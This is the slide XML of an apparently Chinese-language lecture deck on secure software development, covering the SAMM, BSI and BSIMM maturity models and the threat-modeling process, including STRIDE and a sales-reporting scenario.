            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2418080" y="2907030"/>
            <a:ext cx="5875020" cy="2339975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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SAMM</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459230"/>
            <a:ext cx="10205085" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是SAMM</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件保证成熟度模型（Software AssuranceMaturity Mode，SAMM）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提供了一个开放的框架，用以帮助软件公司制定并实施所面临来自软件安全的特定风险的策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="3136900"/>
            <a:ext cx="6096000" cy="2168525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>SAMM可用于</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>评估一个组织已有的软件安全实践；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>建立一个迭代的权衡的软件安全保证计划；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>证明安全保证计划带来的实质性改善；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义并衡量组织中与安全相关的措施。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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SAMM</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495935" y="1525905"/>
            <a:ext cx="4894580" cy="1048385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>核心业务功能：治理、构造、验证、部署</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="3130550"/>
            <a:ext cx="9826625" cy="3501390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5594350" y="1456690"/>
            <a:ext cx="5121275" cy="1473200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成熟度级别：0~3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>0:隐起点，措施尚未实现；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1:对安全实践有了初步了解并有所专门的提供；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2:提高了安全实践的效率和（或）有效性；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3:在一定规模上综合掌握了安全实践</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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BSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型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630045"/>
            <a:ext cx="6096000" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>BSI(Building Security IN)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使安全成为软件开发必须的部分</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>强调应该使用工程化的方法来保证软件安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="708025" y="3429000"/>
            <a:ext cx="7820025" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件安全的三根支柱</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>风险管理：策略性方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接触点：一套轻量级最优工程化方法，攻击与防御综合考虑</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全知识：强调对安全经验和专业技术进行收集汇总，对软件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6584315" y="5189220"/>
            <a:ext cx="4271010" cy="1442085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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BSIMM</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630045"/>
            <a:ext cx="6096000" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>BSI成熟度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对真实的软件安全项目所</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开展的活动进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>量化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>构建和不断发展软件安全行动的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指南</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1673860" y="3121660"/>
            <a:ext cx="8905875" cy="3346450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开发</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>生命</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>周期</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>各模型比较</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316865" y="2040255"/>
            <a:ext cx="11282045" cy="2778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p14:vortex dir="r"/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advClick="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威胁建模</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299845" y="1582420"/>
            <a:ext cx="8367395" cy="3830955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是威胁建模</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>威胁建模是了解系统面临的安全威胁，确定威胁风险并通过适当的缓解措施以降低风险，提高系统安全性的过程。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为什么要威胁建模</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>帮助在设计阶段充分了解各种安全威胁，并指导选择适当的应对措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对可能的风险进行管理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以重新验证其架构和设计</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有助于软件的受攻击面降低</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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威胁建模</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>流程</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054225" y="2044700"/>
            <a:ext cx="1363980" cy="2999740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确定对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>识别威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>评估威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>消减威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059555" y="2044700"/>
            <a:ext cx="6329680" cy="2999740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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威胁建模-确定对象</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530350"/>
            <a:ext cx="6096000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确定要保护和评估的目标（资产）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在使用实例和应用场景中分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>明确应用或系统的关键威胁场景、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>部署方式、配置信 息、用户使用方式等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="3844290"/>
            <a:ext cx="10129520" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>场景示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>创建一个系统来收集销售人员的会计文件，在数据库服务器上计算销售收据，并生成每周报表。该系统目标很简单：从一组系统中获取文件，并在一台中央服务器上对文件进行一定的分析。这是客户所要求的业务目标。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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威胁建模-确定对象</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336290" y="1273175"/>
            <a:ext cx="6238875" cy="5358130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="973455" y="3429000"/>
            <a:ext cx="1363980" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>场景数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>流图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DFD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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威胁建模-识别威胁</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491615"/>
            <a:ext cx="6096000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>识别每一个可能面临的威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>理解软件可能面临的威胁是安全开发的前提</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>威胁不是漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>威胁永远存在</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179195" y="3429000"/>
            <a:ext cx="6886575" cy="2600325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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理解STRIDE六类威胁</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135380" y="1268730"/>
            <a:ext cx="8746490" cy="5266055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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威胁建模-评估威胁</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493520" y="1295400"/>
            <a:ext cx="8713470" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>评估威胁风险值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>评估被利用和攻击发生的概率</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
